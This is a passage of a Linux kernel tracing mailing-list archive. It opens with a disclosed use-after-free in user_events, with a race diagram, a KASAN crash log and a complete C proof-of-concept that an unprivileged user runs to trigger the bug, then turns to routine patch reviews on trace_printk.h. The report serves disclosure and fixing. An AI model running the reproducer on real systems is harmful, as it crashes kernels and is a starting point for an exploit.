 > +    kfree_rcu(enabler, rcu);
 >  }

The issue: user_event_put(enabler->event, locked) is called
synchronously, before kfree_rcu(enabler, rcu).  If this drops the last
reference to the user_event, delayed_destroy_user_event() is scheduled
on a workqueue, which calls destroy_user_event() → kfree(user).  The
user_event memory is freed without RCU protection.

But the enabler itself is now protected by kfree_rcu — it remains
visible to RCU readers in user_event_mm_dup() during fork().  Those
readers access enabler->event (via user_event_enabler_dup →
user_event_get(orig->event)), which now points to freed memory:

   fork()                                       unregister
   ────────                                     ──────────
   user_event_mm_dup()
     rcu_read_lock();
     list_for_each_entry_rcu(enabler, ...)
  user_event_enabler_destroy()
  list_del_rcu(enabler)
  user_event_put(enabler->event)
                                                    → last ref!
                                                    → 
schedule_work(put_work)
                                                  kfree_rcu(enabler, rcu)
       user_event_enabler_dup(enabler, ...)     [workqueue]
         enabler->event =  delayed_destroy_user_event()
           user_event_get(orig->event);  destroy_user_event()
           ↑ UAF: orig->event was freed! kfree(user_event)

[Reproduction]

The PoC runs as an unprivileged user with access to
/sys/kernel/tracing/user_events_data.  It creates two threads sharing
the same mm:

   - fork_worker:  continuously calls fork()/waitpid(), which triggers
                   user_event_mm_dup() → RCU list walk
   - unreg_worker: continuously registers (DIAG_IOCSREG) and unregisters
                   (DIAG_IOCSUNREG) an event enabler, which calls
                   user_event_enabler_destroy()

The race window is small but reproducible within a few iterations on a
multi-CPU QEMU VM.

[Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]

   BUG: KASAN: slab-use-after-free in user_event_mm_dup+0x319/0x630
   Write of size 4 at addr ffff88802c786fa8 by task poc/29997

   Call Trace:
    <TASK>
    dump_stack_lvl
    print_report
    kasan_report
    kasan_check_range
    user_event_mm_dup+0x319/0x630
    copy_process+0x650f/0x8090
    kernel_clone+0x214/0x9c0
    __do_sys_clone+0xce/0x120
    do_syscall_64
    entry_SYSCALL_64_after_hwframe
    </TASK>

   Allocated by task 29998:
    kasan_save_stack
    __kasan_kmalloc
    __kmalloc_cache_noprof
    user_event_parse_cmd+0x721/0x2aa0
    user_events_ioctl+0xcc0/0x1d00
    __x64_sys_ioctl
    do_syscall_64

   Freed by task 5014:
    kasan_save_stack
    __kasan_slab_free
    kfree+0x165/0x710
    destroy_user_event+0x375/0x4f0
    delayed_destroy_user_event+0x8d/0x110
    process_one_work
    worker_thread
    kthread

   Last potentially related work creation:
    queue_work_on
    user_event_put+0x25d/0x460
    user_events_ioctl+0x1795/0x1d00
    __x64_sys_ioctl
    do_syscall_64

   ------------[ cut here ]------------
   refcount_t: addition on 0; use-after-free.
   WARNING: lib/refcount.c:25 at refcount_warn_saturate+0xf9/0x120
   Call Trace:
    user_event_mm_dup+0x349/0x630

The refcount warning on top of the KASAN report is a strong double
confirmation: user_event_get(orig->event) is trying to increment a
refcount on memory that has already been freed and zeroed.

The PoC is attached below.  It's a single C file, compiles with:

   gcc -o poc poc.c -static -lpthread

[1] 
https://sashiko.dev/#/patchset/20260618222743.538915-1-michael.bommarito%40gmail.com
     (Sashiko AI code review — "Use-After-Free", Severity: Critical)

Thanks,
XIAO

// PoC: user_event UAF on event object via user_event_mm_dup()
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <stdint.h>

#define DIAG_IOC_MAGIC  '*'
#define DIAG_IOCSREG    _IOWR(DIAG_IOC_MAGIC, 0, struct user_reg*)
#define DIAG_IOCSDEL    _IOW(DIAG_IOC_MAGIC, 1, char*)
#define DIAG_IOCSUNREG  _IOW(DIAG_IOC_MAGIC, 2, struct user_unreg*)

struct user_reg {
     uint32_t size; uint8_t enable_bit; uint8_t enable_size;
     uint16_t flags; uint64_t enable_addr; uint64_t name_args;
     uint32_t write_index;
} __attribute__((__packed__));

struct user_unreg {
     uint32_t size; uint8_t disable_bit; uint8_t __reserved;
     uint16_t __reserved2; uint64_t disable_addr;
} __attribute__((__packed__));

static volatile int stop_flag = 0;
static void *enable_page = NULL;
static const char *event_name = "poc_uaf_test";

static int open_fd(void)
{
     int fd = open("/sys/kernel/tracing/user_events_data", O_WRONLY);
     if (fd < 0)
         fd = open("/sys/kernel/debug/tracing/user_events_data", O_WRONLY);
     return fd;
}

static int do_reg(int fd, void *addr)
{
     struct user_reg reg = {0};
     reg.size = sizeof(reg);
     reg.enable_bit = 0;
     reg.enable_size = 4;
     reg.flags = 0;
     reg.enable_addr = (uint64_t)(unsigned long)addr;
     reg.name_args = (uint64_t)(unsigned long)event_name;
     return ioctl(fd, DIAG_IOCSREG, &reg);
}

static int do_unreg(int fd, void *addr)
{
     struct user_unreg unreg = {0};
     unreg.size = sizeof(unreg);
     unreg.disable_bit = 0;
     unreg.disable_addr = (uint64_t)(unsigned long)addr;
     return ioctl(fd, DIAG_IOCSUNREG, &unreg);
}

static void *fork_worker(void *arg)
{
     pid_t pid; int status;
     cpu_set_t cpuset;
     CPU_ZERO(&cpuset); CPU_SET(1, &cpuset);
     pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);
     while (!stop_flag) {
         pid = fork();
         if (pid == 0) _exit(0);
         else if (pid > 0) waitpid(pid, &status, 0);
         else usleep(100);
     }
     return NULL;
}

static void *unreg_worker(void *arg)
{
     int fd;
     cpu_set_t cpuset;
     CPU_ZERO(&cpuset); CPU_SET(2, &cpuset);
     pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);
     while (!stop_flag) {
         fd = open_fd();
         if (fd < 0) continue;
         /* Ensure an enabler exists, then unregister to destroy it */
         if (do_reg(fd, enable_page) < 0 && errno == EADDRINUSE) {
             do_unreg(fd, enable_page);
             do_reg(fd, enable_page);
         }
         close(fd);
         fd = open_fd();
         if (fd < 0) continue;
         do_unreg(fd, enable_page);
         close(fd);
         usleep(100);
     }
     return NULL;
}

int main(int argc, char **argv)
{
     pthread_t t_fork, t_unreg;
     int fd, i, iters = 30;
     if (argc > 1) iters = atoi(argv[1]);
     printf("[+] PoC: user_event UAF in user_event_mm_dup\n");
     printf("[+] Running %d iterations (3s each)\n", iters);
     enable_page = mmap(NULL, 4096, PROT_READ|PROT_WRITE,
         MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
     if (enable_page == MAP_FAILED) { perror("mmap"); return 1; }
     memset(enable_page, 0, 4096);
     fd = open_fd();
     if (fd < 0) { perror("open /sys/kernel/tracing/user_events_data"); 
return 1; }
     if (do_reg(fd, enable_page) < 0 && errno != EADDRINUSE) {
         perror("reg"); close(fd); return 1;
     }
     close(fd);
     printf("[+] Event initialized\n");
     for (i = 0; i < iters; i++) {
         printf("[+] Iter %d/%d\n", i+1, iters);
         /* Re-create enabler */
         fd = open_fd();
         if (fd >= 0) {
             if (do_reg(fd, enable_page) < 0 && errno == EADDRINUSE) {
                 do_unreg(fd, enable_page);
                 do_reg(fd, enable_page);
             }
             close(fd);
         }
         stop_flag = 0;
         pthread_create(&t_fork, NULL, fork_worker, NULL);
         pthread_create(&t_unreg, NULL, unreg_worker, NULL);
         usleep(3000000);
         stop_flag = 1;
         pthread_join(t_unreg, NULL);
         pthread_join(t_fork, NULL);
     }
     printf("[+] Done\n");
     return 0;
}


^ permalink raw reply

* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Steven Rostedt @ 2026-06-22 16:51 UTC (permalink / raw)
  To: Randy Dunlap
  Cc: Peter Zijlstra, linux-kernel, linux-trace-kernel,
	Masami Hiramatsu, Mark Rutland, Mathieu Desnoyers, Andrew Morton,
	Linus Torvalds, Sebastian Andrzej Siewior, John Ogness,
	Thomas Gleixner, Julia Lawall, Yury Norov, linux-doc,
	linux-kbuild, linuxppc-dev, dri-devel, linux-stm32,
	linux-arm-kernel, linux-rdma, linux-usb, linux-ext4, linux-nfs,
	kvm, intel-gfx
In-Reply-To: <08b3c961-18bb-43d9-8d7f-8a87bcad0afa@infradead.org>

On Mon, 22 Jun 2026 09:40:45 -0700
Randy Dunlap <rdunlap@infradead.org> wrote:

> > Did you forget your C 101 class? If you use a function, you gotta
> > include the relevant header.  
> 
> Also item #1 in Documentation/process/submit-checklist.rst.

What is that? Remove all trace_printk()s before you submit?

Because that is what you should do. But now you also need to remember
to remove the include <linux/trace_printk.h> too. Or, I guess if
someone uses it a lot, they may just keep it in their files without the
trace_printk()s.

-- Steve

^ permalink raw reply

* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Randy Dunlap @ 2026-06-22 16:40 UTC (permalink / raw)
  To: Peter Zijlstra, Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Julia Lawall, Yury Norov, linux-doc, linux-kbuild, linuxppc-dev,
	dri-devel, linux-stm32, linux-arm-kernel, linux-rdma, linux-usb,
	linux-ext4, linux-nfs, kvm, intel-gfx
In-Reply-To: <20260622083440.GX49951@noisy.programming.kicks-ass.net>



On 6/22/26 1:34 AM, Peter Zijlstra wrote:
> On Sun, Jun 21, 2026 at 05:34:30AM -0400, Steven Rostedt wrote:
>> There's been complaints about trace_printk() being defined in kernel.h as it
>> can increase the compilation time. As it is only used by some developers for
>> debugging purposes, it should not be in kernel.h causing lots of wasted CPU
>> cycles for those that do not ever care about it.
>>
>> Instead, add a CONFIG_TRACE_PRINTK_DEBUGGING option that developers that do
>> use it can set and not have to always remember to add #include <linux/trace_printk.h>
>> to the files they add trace_printk() while debugging. It also means that
>> those that do not have that config set will not have to worry about wasted
>> CPU cycles as it is only include in the CFLAGS when the option is set, and
>> its completely ignored otherwise.
> 
> Did you forget your C 101 class? If you use a function, you gotta
> include the relevant header.

Also item #1 in Documentation/process/submit-checklist.rst.

> You don't see userspace saying: 'Hey, you know what, perhaps we should
> add stdio.h to every other header, just in case someone wants to
> printf()' either.
> 
> I really don't understand your argument. Yes, maybe someone will forget
> and then either their editor (if they have a halfway modern setup with
> LSP enabled) or their build will complain, but so what? This is all
> trivial stuff, surely we have more pressing matters to concern outselves
> with?



-- 
~Randy


^ permalink raw reply

* Re: [PATCH v3] mm/lruvec: trace LRU add drains and drain-all requests
From: JP Kobryn @ 2026-06-22 16:38 UTC (permalink / raw)
  To: David Hildenbrand (Arm), Vlastimil Babka (SUSE), Shakeel Butt
  Cc: linux-mm, willy, usama.arif, akpm, mhocko, rostedt, mhiramat,
	mathieu.desnoyers, kasong, qi.zheng, baohua, axelrasmussen,
	yuanchu, weixugc, chrisl, shikemeng, nphamcs, baoquan.he,
	youngjun.park, linux-kernel, linux-trace-kernel
In-Reply-To: <d4b55716-97c7-4e75-8500-6a1171ad7fc6@kernel.org>

On 6/18/26 5:38 AM, David Hildenbrand (Arm) wrote:
> On 6/18/26 10:30, Vlastimil Babka (SUSE) wrote:
>> On 6/18/26 10:21, David Hildenbrand (Arm) wrote:
>>> On 6/17/26 20:18, Vlastimil Babka (SUSE) wrote:
>>>>
>>>> Yeah and I don't recall ever that a change to a mm tracepoint would ever
>>>> break someone who'd complain and we'd have to revert it.
>>> Really? :)
>>>
>>> Read the context of the link I posted once more.
>>
>> Ah, I see. I've only read the single mail from Steven that referred to the
>> old powertop breakage and didn't notice the context.
>>
>> But I don't think these worries should stop us from adding easily usable
>> tracepoints.
> 
> Steve explained a way how apparently scheduler people are handling it without
> trace events.
> 
> You can always remove/modify tracepoints, but not trace events.
> 
> Anyhow, just wanted to mention it, because so far MM didn't rally know about
> this implication.
> 

Thanks for pointing this out. I'll sent v4 using DECLARE_TRACE() to
avoid creating a new event.


^ permalink raw reply

* Re: [PATCH v2 1/2] tracing: Move non-trace_printk prototypes into trace_controls.h
From: Yury Norov @ 2026-06-22 16:02 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: Yury Norov, linux-kernel, linux-trace-kernel, Masami Hiramatsu,
	Mark Rutland, Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall
In-Reply-To: <20260622112127.5763f5ba@fedora>

On Mon, Jun 22, 2026 at 11:21:27AM -0400, Steven Rostedt wrote:
> On Mon, 22 Jun 2026 09:41:16 -0400
> Yury Norov <yury.norov@gmail.com> wrote:
> 
> > On Mon, Jun 22, 2026 at 09:07:40AM -0400, Steven Rostedt wrote:
> > > From: Steven Rostedt <rostedt@goodmis.org>
> > > 
> > > In order to remove the include to trace_printk.h from kernel.h the tracing
> > > control prototypes need to be separated into their own header file as they
> > > are used in other common header files like rcu.h. There's no point in
> > > removing trace_printk.h from kernel.h if it just gets added back to other
> > > common headers.
> > > 
> > > Prototypes are very cheap for the compiler and should not be an issue.
> > > 
> > > Signed-off-by: Steven Rostedt <rostedt@goodmis.org>  
> > 
> > Suggested-by: Yury Norov <yury.norov@gmail.com>
> 
> Thanks, I'll add you tag.

Thanks, but can you also comment on trace_dump/ftrace_dump?

^ permalink raw reply

* Re: [PATCH v2 2/2] tracing: Remove trace_printk.h from kernel.h
From: Yury Norov @ 2026-06-22 16:01 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall, Yury Norov
In-Reply-To: <20260622131029.816825024@kernel.org>

On Mon, Jun 22, 2026 at 09:07:41AM -0400, Steven Rostedt wrote:
> From: Steven Rostedt <rostedt@goodmis.org>
> 
> There have been complaints about trace_printk.h causing more build time
> for being in kernel.h. Move it out of kernel.h and place it in the headers
> and C files that use it.
> 
> Link: https://lore.kernel.org/all/CAHk-=wikCBeVFjVXiY4o-oepdbjAoir5+TcAgtL12c4u1TpZLQ@mail.gmail.com/

Link is nice, but can you explain in the commit message what those
complaints exactly are? There's enough opinions shared to make a nice
summary. I even think it's important enough to become a Documentation
rule.
 
> Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
> ---
> Changes since v1: https://patch.msgid.link/20260621093811.168514984@kernel.org
> 
> - Just remove trace_printk.h and fix up all the places that need it.
> 
>  arch/powerpc/kvm/book3s_xics.c         | 1 +
>  drivers/gpu/drm/i915/gt/intel_gtt.h    | 1 +
>  drivers/gpu/drm/i915/i915_gem.h        | 1 +
>  drivers/hwtracing/stm/dummy_stm.c      | 4 ++++
>  drivers/infiniband/hw/hfi1/trace_dbg.h | 1 +
>  drivers/usb/early/xhci-dbc.c           | 1 +
>  fs/ext4/inline.c                       | 1 +
>  include/linux/ftrace.h                 | 2 ++
>  include/linux/kernel.h                 | 1 -
>  include/linux/sunrpc/debug.h           | 1 +
>  include/linux/trace_printk.h           | 5 +++--
>  kernel/trace/ring_buffer_benchmark.c   | 1 +
>  samples/fprobe/fprobe_example.c        | 1 +
>  samples/ftrace/ftrace-direct-too.c     | 1 -
>  samples/trace_printk/trace-printk.c    | 1 +
>  15 files changed, 19 insertions(+), 4 deletions(-)
> 
> diff --git a/arch/powerpc/kvm/book3s_xics.c b/arch/powerpc/kvm/book3s_xics.c
> index 74a44fa702b0..ef5eb596a56e 100644
> --- a/arch/powerpc/kvm/book3s_xics.c
> +++ b/arch/powerpc/kvm/book3s_xics.c
> @@ -26,6 +26,7 @@
>  #if 1
>  #define XICS_DBG(fmt...) do { } while (0)
>  #else
> +#include <linux/trace_printk.h>
>  #define XICS_DBG(fmt...) trace_printk(fmt)
>  #endif
>  
> diff --git a/drivers/gpu/drm/i915/gt/intel_gtt.h b/drivers/gpu/drm/i915/gt/intel_gtt.h
> index b54ee4f25af1..f6f223090760 100644
> --- a/drivers/gpu/drm/i915/gt/intel_gtt.h
> +++ b/drivers/gpu/drm/i915/gt/intel_gtt.h
> @@ -35,6 +35,7 @@
>  #define I915_GFP_ALLOW_FAIL (GFP_KERNEL | __GFP_RETRY_MAYFAIL | __GFP_NOWARN)
>  
>  #if IS_ENABLED(CONFIG_DRM_I915_TRACE_GTT)
> +#include <linux/trace_printk.h>

So, before it was included unconditionally, now it's included. It
looks technically correct, but conceptually - I'm not sure.

I'm not a developer of this driver, but ... here we need trace_printk.h
if TRACE_GTT is enabled, in the next header TRACE_GEM needs it. To me
it sounds like the whole driver simply needs trace_printk.h.

>  #define GTT_TRACE(...) trace_printk(__VA_ARGS__)
>  #else
>  #define GTT_TRACE(...)
> diff --git a/drivers/gpu/drm/i915/i915_gem.h b/drivers/gpu/drm/i915/i915_gem.h
> index 1da8fb61c09e..f490052e8964 100644
> --- a/drivers/gpu/drm/i915/i915_gem.h
> +++ b/drivers/gpu/drm/i915/i915_gem.h
> @@ -117,6 +117,7 @@ int i915_gem_open(struct drm_i915_private *i915, struct drm_file *file);
>  
>  #if IS_ENABLED(CONFIG_DRM_I915_TRACE_GEM)
>  #include <linux/trace_controls.h>
> +#include <linux/trace_printk.h>
>  #define GEM_TRACE(...) trace_printk(__VA_ARGS__)
>  #define GEM_TRACE_ERR(...) do {						\
>  	pr_err(__VA_ARGS__);						\
> diff --git a/drivers/hwtracing/stm/dummy_stm.c b/drivers/hwtracing/stm/dummy_stm.c
> index 38528ffdc0b3..784f9af7ccba 100644
> --- a/drivers/hwtracing/stm/dummy_stm.c
> +++ b/drivers/hwtracing/stm/dummy_stm.c
> @@ -14,6 +14,10 @@
>  #include <linux/stm.h>
>  #include <uapi/linux/stm.h>
>  
> +#ifdef DEBUG
> +#include <linux/trace_printk.h>
> +#endif
> +

Same here. The cost of adding the header in a particular C file is
unmeasurable. But playing "#undef DEBUG #ifdef DEBUG" games looks
weird.

Imagine, the developer has this DEBUG enabled, then adds another
debugging trace_pritnk() out of the DEBUG block, compiles his patch
well, then sends to the user, who has DEBUG disabled; and now we hit
the same problem as in the config-based case.

Let's put it simple: dummy_stm just needs trace_printk.h.

>  static ssize_t notrace
>  dummy_stm_packet(struct stm_data *stm_data, unsigned int master,
>  		 unsigned int channel, unsigned int packet, unsigned int flags,
> diff --git a/drivers/infiniband/hw/hfi1/trace_dbg.h b/drivers/infiniband/hw/hfi1/trace_dbg.h
> index 58304b91380f..30df5e246586 100644
> --- a/drivers/infiniband/hw/hfi1/trace_dbg.h
> +++ b/drivers/infiniband/hw/hfi1/trace_dbg.h
> @@ -103,6 +103,7 @@ __hfi1_trace_def(IOCTL);
>   */
>  
>  #ifdef HFI1_EARLY_DBG
> +#include <linux/trace_printk.h>
>  #define hfi1_dbg_early(fmt, ...) \
>  	trace_printk(fmt, ##__VA_ARGS__)
>  #else
> diff --git a/drivers/usb/early/xhci-dbc.c b/drivers/usb/early/xhci-dbc.c
> index 41118bba9197..955c73bd601f 100644
> --- a/drivers/usb/early/xhci-dbc.c
> +++ b/drivers/usb/early/xhci-dbc.c
> @@ -30,6 +30,7 @@ static struct xdbc_state xdbc;
>  static bool early_console_keep;
>  
>  #ifdef XDBC_TRACE
> +#include <linux/trace_printk.h>
>  #define	xdbc_trace	trace_printk
>  #else
>  static inline void xdbc_trace(const char *fmt, ...) { }
> diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
> index 8045e4ff270c..0eff4a0c6a6c 100644
> --- a/fs/ext4/inline.c
> +++ b/fs/ext4/inline.c
> @@ -934,6 +934,7 @@ static int ext4_da_convert_inline_data_to_extent(struct address_space *mapping,
>  }
>  
>  #ifdef INLINE_DIR_DEBUG
> +#include <linux/trace_printk.h>
>  void ext4_show_inline_dir(struct inode *dir, struct buffer_head *bh,
>  			  void *inline_start, int inline_size)
>  {
> diff --git a/include/linux/ftrace.h b/include/linux/ftrace.h
> index 02bc5027523a..b5336a81e619 100644
> --- a/include/linux/ftrace.h
> +++ b/include/linux/ftrace.h
> @@ -8,6 +8,8 @@
>  #define _LINUX_FTRACE_H
>  
>  #include <linux/trace_recursion.h>
> +#include <linux/trace_controls.h>
> +#include <linux/trace_printk.h>
>  #include <linux/trace_clock.h>
>  #include <linux/jump_label.h>
>  #include <linux/kallsyms.h>
> diff --git a/include/linux/kernel.h b/include/linux/kernel.h
> index e5570a16cbb1..e87a40fbd152 100644
> --- a/include/linux/kernel.h
> +++ b/include/linux/kernel.h
> @@ -31,7 +31,6 @@
>  #include <linux/build_bug.h>
>  #include <linux/sprintf.h>
>  #include <linux/static_call_types.h>
> -#include <linux/trace_printk.h>
>  #include <linux/util_macros.h>
>  #include <linux/wordpart.h>
>  
> diff --git a/include/linux/sunrpc/debug.h b/include/linux/sunrpc/debug.h
> index ab61bed2f7af..7524f5d82fba 100644
> --- a/include/linux/sunrpc/debug.h
> +++ b/include/linux/sunrpc/debug.h
> @@ -29,6 +29,7 @@ extern unsigned int		nlm_debug;
>  # define ifdebug(fac)		if (unlikely(rpc_debug & RPCDBG_##fac))
>  
>  # if IS_ENABLED(CONFIG_SUNRPC_DEBUG_TRACE)
> +#  include <linux/trace_printk.h>
>  #  define __sunrpc_printk(fmt, ...)	trace_printk(fmt, ##__VA_ARGS__)
>  # else
>  #  define __sunrpc_printk(fmt, ...)	printk(KERN_DEFAULT fmt, ##__VA_ARGS__)
> diff --git a/include/linux/trace_printk.h b/include/linux/trace_printk.h
> index a488ea9e9f85..74ce4f8995c4 100644
> --- a/include/linux/trace_printk.h
> +++ b/include/linux/trace_printk.h
> @@ -1,11 +1,12 @@
>  /* SPDX-License-Identifier: GPL-2.0 */
>  #ifndef _LINUX_TRACE_PRINTK_H
>  #define _LINUX_TRACE_PRINTK_H
> +#if !defined(__ASSEMBLY__) && !defined(__GENKSYMS__) && !defined(BUILD_VDSO)
>  
> -#include <linux/compiler_attributes.h>
>  #include <linux/instruction_pointer.h>
>  #include <linux/stddef.h>
>  #include <linux/stringify.h>
> +#include <linux/stdarg.h>
>  
>  #ifdef CONFIG_TRACING
>  static inline __printf(1, 2)
> @@ -147,5 +148,5 @@ ftrace_vprintk(const char *fmt, va_list ap)
>  	return 0;
>  }
>  #endif /* CONFIG_TRACING */
> -
> +#endif /* !defined(__ASSEMBLY__) && !defined(__GENKSYMS__) && !defined(BUILD_VDSO) */
>  #endif
> diff --git a/kernel/trace/ring_buffer_benchmark.c b/kernel/trace/ring_buffer_benchmark.c
> index 593e3b59e42e..2bb25caebb75 100644
> --- a/kernel/trace/ring_buffer_benchmark.c
> +++ b/kernel/trace/ring_buffer_benchmark.c
> @@ -5,6 +5,7 @@
>   * Copyright (C) 2009 Steven Rostedt <srostedt@redhat.com>
>   */
>  #include <linux/ring_buffer.h>
> +#include <linux/trace_printk.h>
>  #include <linux/completion.h>
>  #include <linux/kthread.h>
>  #include <uapi/linux/sched/types.h>
> diff --git a/samples/fprobe/fprobe_example.c b/samples/fprobe/fprobe_example.c
> index bfe98ce826f3..de81b9b4ca7d 100644
> --- a/samples/fprobe/fprobe_example.c
> +++ b/samples/fprobe/fprobe_example.c
> @@ -12,6 +12,7 @@
>  
>  #define pr_fmt(fmt) "%s: " fmt, __func__
>  
> +#include <linux/trace_printk.h>
>  #include <linux/kernel.h>
>  #include <linux/module.h>
>  #include <linux/fprobe.h>
> diff --git a/samples/ftrace/ftrace-direct-too.c b/samples/ftrace/ftrace-direct-too.c
> index bf2411aa6fd7..159190f4103f 100644
> --- a/samples/ftrace/ftrace-direct-too.c
> +++ b/samples/ftrace/ftrace-direct-too.c
> @@ -1,6 +1,5 @@
>  // SPDX-License-Identifier: GPL-2.0-only
>  #include <linux/module.h>
> -
>  #include <linux/mm.h> /* for handle_mm_fault() */
>  #include <linux/ftrace.h>
>  #if !defined(CONFIG_ARM64) && !defined(CONFIG_PPC32)
> diff --git a/samples/trace_printk/trace-printk.c b/samples/trace_printk/trace-printk.c
> index cfc159580263..ff37aeb8523e 100644
> --- a/samples/trace_printk/trace-printk.c
> +++ b/samples/trace_printk/trace-printk.c
> @@ -1,4 +1,5 @@
>  // SPDX-License-Identifier: GPL-2.0-only
> +#include <linux/trace_printk.h>
>  #include <linux/module.h>
>  #include <linux/kthread.h>
>  #include <linux/irq_work.h>
> -- 
> 2.53.0
> 

^ permalink raw reply

* [PATCH] tracing/probes: make file offset error message probe-agnostic
From: Yudistira Putra @ 2026-06-22 16:00 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, linux-trace-kernel, linux-kernel,
	Yudistira Putra

The shared probe argument parser rejects file offsets for kernel probes.
This path is used outside the kprobe event parser too, but the diagnostic
currently says "with kprobe" even when emitted from another probe path.

Make the diagnostic probe-agnostic.

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 kernel/trace/trace_probe.c | 2 +-
 kernel/trace/trace_probe.h | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
index fd1caa1f9723..fec0ad51cf61 100644
--- a/kernel/trace/trace_probe.c
+++ b/kernel/trace/trace_probe.c
@@ -1228,7 +1228,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 			code->op = FETCH_OP_IMM;
 			code->immediate = param;
 		} else if (arg[1] == '+') {
-			/* kprobes don't support file offsets */
+			/* Kernel probes do not support file offsets */
 			if (ctx->flags & TPARG_FL_KERNEL) {
 				trace_probe_log_err(ctx->offset, FILE_ON_KPROBE);
 				return -EINVAL;
diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 15758cc11fc6..6162f066c2b8 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -516,7 +516,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
 	C(BAD_MEM_ADDR,		"Invalid memory address"),		\
 	C(BAD_IMM,		"Invalid immediate value"),		\
 	C(IMMSTR_NO_CLOSE,	"String is not closed with '\"'"),	\
-	C(FILE_ON_KPROBE,	"File offset is not available with kprobe"), \
+	C(FILE_ON_KPROBE,	"File offset is not available for kernel probes"), \
 	C(BAD_FILE_OFFS,	"Invalid file offset value"),		\
 	C(SYM_ON_UPROBE,	"Symbol is not available with uprobe"),	\
 	C(TOO_MANY_OPS,		"Dereference is too much nested"), 	\
-- 
2.43.0


^ permalink raw reply related

* [PATCH] tracing/probes: fix typo in invalid variable error message
From: Yudistira Putra @ 2026-06-22 15:23 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, linux-trace-kernel, linux-kernel,
	Yudistira Putra

Fix a typo in the BAD_VAR diagnostic emitted for invalid $-variables
in probe event arguments.

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 kernel/trace/trace_probe.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 15758cc11fc6..0f09f7aaf93f 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -511,7 +511,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
 	C(NO_RETVAL,		"This function returns 'void' type"),	\
 	C(BAD_STACK_NUM,	"Invalid stack number"),		\
 	C(BAD_ARG_NUM,		"Invalid argument number"),		\
-	C(BAD_VAR,		"Invalid $-valiable specified"),	\
+	C(BAD_VAR,		"Invalid $-variable specified"),	\
 	C(BAD_REG_NAME,		"Invalid register name"),		\
 	C(BAD_MEM_ADDR,		"Invalid memory address"),		\
 	C(BAD_IMM,		"Invalid immediate value"),		\
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH v2 0/2] tracing: Remove trace_printk.h from kernel.h
From: Steven Rostedt @ 2026-06-22 15:21 UTC (permalink / raw)
  To: Masami Hiramatsu (Google)
  Cc: linux-kernel, linux-trace-kernel, Mark Rutland, Mathieu Desnoyers,
	Andrew Morton, Linus Torvalds, Sebastian Andrzej Siewior,
	John Ogness, Thomas Gleixner, Peter Zijlstra, Julia Lawall,
	Yury Norov
In-Reply-To: <20260622234416.9f85ff87b81bcfb9776c73a6@kernel.org>

On Mon, 22 Jun 2026 23:44:16 +0900
Masami Hiramatsu (Google) <mhiramat@kernel.org> wrote:

> The series looks good to me.
> 
> Acked-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>

Thanks!

-- Steve

^ permalink raw reply

* Re: [PATCH v2 1/2] tracing: Move non-trace_printk prototypes into trace_controls.h
From: Steven Rostedt @ 2026-06-22 15:21 UTC (permalink / raw)
  To: Yury Norov
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall
In-Reply-To: <ajk7fN5v31kCfGVp@yury>

On Mon, 22 Jun 2026 09:41:16 -0400
Yury Norov <yury.norov@gmail.com> wrote:

> On Mon, Jun 22, 2026 at 09:07:40AM -0400, Steven Rostedt wrote:
> > From: Steven Rostedt <rostedt@goodmis.org>
> > 
> > In order to remove the include to trace_printk.h from kernel.h the tracing
> > control prototypes need to be separated into their own header file as they
> > are used in other common header files like rcu.h. There's no point in
> > removing trace_printk.h from kernel.h if it just gets added back to other
> > common headers.
> > 
> > Prototypes are very cheap for the compiler and should not be an issue.
> > 
> > Signed-off-by: Steven Rostedt <rostedt@goodmis.org>  
> 
> Suggested-by: Yury Norov <yury.norov@gmail.com>

Thanks, I'll add you tag.

-- Steve

^ permalink raw reply

* [PATCH v2 2/2] tracing/user_events: Replace a seq_printf() call by seq_puts() in user_seq_show()
From: Markus Elfring @ 2026-06-22 15:11 UTC (permalink / raw)
  To: linux-trace-kernel, Masami Hiramatsu, Mathieu Desnoyers,
